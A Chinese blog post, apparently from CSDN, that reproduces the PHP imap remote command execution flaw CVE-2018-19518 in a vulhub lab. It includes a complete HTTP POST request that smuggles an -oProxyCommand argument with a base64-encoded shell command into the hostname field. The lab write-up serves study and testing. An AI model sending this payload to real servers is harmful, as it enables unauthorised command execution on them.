PHP imap 远程命令执行漏洞(CVE-2018-19518)

最新推荐文章于 2024-04-28 00:03:33 发布
最新推荐文章于 2024-04-28 00:03:33 发布
阅读量231 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118889282
版权

漏洞详细

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。

漏洞复现

环境启动后,访问http://your-ip:8080即可查看web页面。Web功能是测试一个邮件服务器是否能够成功连接,需要填写服务器地址、用户名和密码。网页源码index.php
发送如下数据包即可成功执行命令echo '1234567890'>/tmp/test0001

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

在这里插入图片描述
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP imap 远程命令执行漏洞复现(CVE-2018-19518
0xSec
12-27 1101
IMAP是在系统中执行任何命令的桥梁。Internet消息访问协议(IMAP)是电子邮件客户端用于通过TCP / IP连接从邮件服务器检索电子邮件的Internet标准协议。IMAP由Mark Crispin于1986年设计为远程邮箱协议,与广泛使用的POP(一种用于检索邮箱内容的协议)形成对比。目前,IMAP由RFC 3501定义规格。IMAP的设计目标是允许多个电子邮件客户端完全管理电子邮件收件箱。因此,客户端通常会在服务器上保留消息,直到用户明确删除它们为止。
PHP imap 远程命令执行漏洞CVE-2018-19158)
qq_43571759的博客
04-15 397
PHP imap 远程命令执行漏洞CVE-2018-19158) php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击...
cve-2018-19518漏洞复现
最新发布
m0_74402888的博客
04-28 564
php imap扩展用户在php执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中默认使用ssh来代替rsh功能,也就是说debian系列系统中,执行rsh命令实际执行的是ssh命令debian系列系统有Ubuntu、kali、MX linux、AntiX、PureOS等ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者可以通过注入这个参数,最终将导致命令执行漏洞
[Vulhub] PHP imap远程命令执行漏洞CVE-2018-19518
weixin_45605352的博客
05-08 1636
0x01 预备知识 PHPimap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian / ubuntu中用来使用ssh来代替rsh的功能(即在debian系列系统中,执行rsh命令)实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。 如果启用了
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
远程执行代码漏洞(CVE-2018-0886)漏洞修复
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
首先,我们需要理解什么是远程命令执行漏洞。RCE漏洞允许攻击者通过网络在目标系统上执行任意命令,通常是因为程序处理用户输入时存在不安全的代码实践。在Spring4Shell漏洞中,问题出在Spring MVC和Spring WebFlux...
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)
05-31
针对 CVE-2018-15133 的 Laravel 漏洞利用此代码利用 ,它基于和对该漏洞。 我几乎只是为一个盒子做了这个,因为我现在不想使用 Metasploit,也不想作为练习 Python 的借口。 来自 CVE 的描述: 在 Laravel ...
Cyrus IMAP Server的四个漏洞分析
03-03
Stefan Esser发现了Cyrus IMAP Server的四个漏洞,其中IMAPMAGICPLUS预验证远程缓冲区溢出漏洞最危险,也最容易利用。本文主要介绍对定位漏洞和触发漏洞进行分析,给出了利用程序的实现方法。
P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518
在下小黄的博客
03-19 475
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 今天更新的是: P1 利用Vulnhub复现漏洞 - PHP imap 远程命令执行漏洞CVE-2018-19518) 往期检索:程序设计学习笔记——目录 创建时间:2021年3月19日 软件: MindMaster Pro 、Burp Suite Pro 、火狐浏览器 PHP imap 远程命令执行漏洞CVE-2018-19518)一级目录二级目录三级目录 一级目录 二级目录 三级目录 各位路过的朋友,如果觉得可
CVE-2018-19518- imap 远程命令执行漏洞分析
lyy0xfff的博客
08-03 2442
CVE-2018-19518 IMAP 远程命令执行漏洞分析 0x00 漏洞介绍 IMAP协议(因特网消息访问协议)它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息,下载邮件等。它运行在TCP/IP协议之上,使用的端口是143。在php中调用的是imap_open函数 imap_open( string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而,debian/ubu
PHP 远程命令执行漏洞CVE-2018-19518
qq_46501419的博客
03-21 894
CVE-2018-19518详细信息影响范围复现过程 详细信息 在PHP和其他产品的imap_open()中使用的UNIX上的华盛顿大学IMAP工具包2007f启动rsh命令(借助于c-client / imap4r1.c中的imap_rimap函数和osdep / unix / tcp_unix中的tcp_aopen函数.c),而不会阻止参数注入,如果IMAP服务器名称是不受信任的输入(例如,由Web应用程序的用户输入),并且rsh已被具有不同参数的程序替换,则远程攻击者可能会执行任意OS命令语义。 例如
PHP imap 远程命令执行漏洞 CVE-2018-19518 漏洞复现
ADummy的博客
02-25 289
PHP imap 远程命令执行漏洞CVE-2018-19518) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>代码执行 0x01漏洞介绍 ​ php imap扩展用于在PHP执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。 因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令
php imap命令执行,PHP “/imap/php_imap.c”释放后重利用远程代码执行漏洞
weixin_28786193的博客
03-22 85
发布日期:2010-11-19更新日期:2010-11-23受影响系统:MandrakeSoft Corporate Server 4.0 x86_64MandrakeSoft Corporate Server 4.0MandrakeSoft Linux Mandrake 9.0MandrakeSoft Linux Mandrake 10.1 x86_64MandrakeSoft Linux Ma...
4.7、漏洞利用-SMTP
c10udz的博客
10-13 3765
1.1、邮件发送和接收模型 邮件发送使用SMTP协议,占用25号端口。而邮件接收使用pop3或IMAP协议,分别使用110和143端口 使用postfix+dovecot的模式搭建邮件服务器,一个邮件服务器通常包含两个组件
PHP 输入验证漏洞 CVE-2018-10547复现
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是复现该漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值